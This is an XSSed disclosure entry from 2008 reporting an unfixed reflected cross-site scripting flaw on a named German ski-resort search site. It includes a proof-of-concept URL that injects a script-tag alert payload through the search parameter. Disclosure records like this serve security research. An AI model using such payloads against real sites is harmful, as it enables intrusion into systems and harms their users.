Unfixed XSS vulnerability at www.skigebietssuche.info

2008-03-04T00:00:00
ID XSSED:34990
Type xssed
Reporter Hanno Boeck
Modified 2008-03-04T00:00:00

Description

Security researcher Hanno Boeck submitted a cross-site scripting (XSS) vulnerability affecting www.skigebietssuche.info on 03/04/2008. At the time of submission, the site ranked 4311236 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.skigebietssuche.info/de/index.php?move=0&volltextsuchbegriff=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&landsonst%5B%5D=1&landsonst%5B%5D=2&landsonst%5B%5D=4&landsonst%5B%5D=3&landsonst%5B%5D=5&landsonst%5B%5D=7&landsonst%5B%5D=16&landsonst%5B%5D=9&landsonst%5B%5D=15&landsonst%5B%5D=18&landsonst%5B%5D=8&landsonst%5B%5D=11&landsonst%5B%5D=17&landsonst%5B%5D=20&landsonst%5B%5D=10&landsonst%5B%5D=13&landsonst%5B%5D=14&landsonst%5B%5D=6&landsonst%5B%5D=12&tal=0&berg=0&diff=0&pistengesamt=0&pistenleicht=0&pistenmittel=0&pistenschwer=0&liftgesamt=0&liftgonsess=0&liftschlepp=0&liftsess=0&liftgonkl=0&liftgongr=0&ort_txtfld=&entfernungmax=10000&page_size=10&submit.x=0&submit.y=0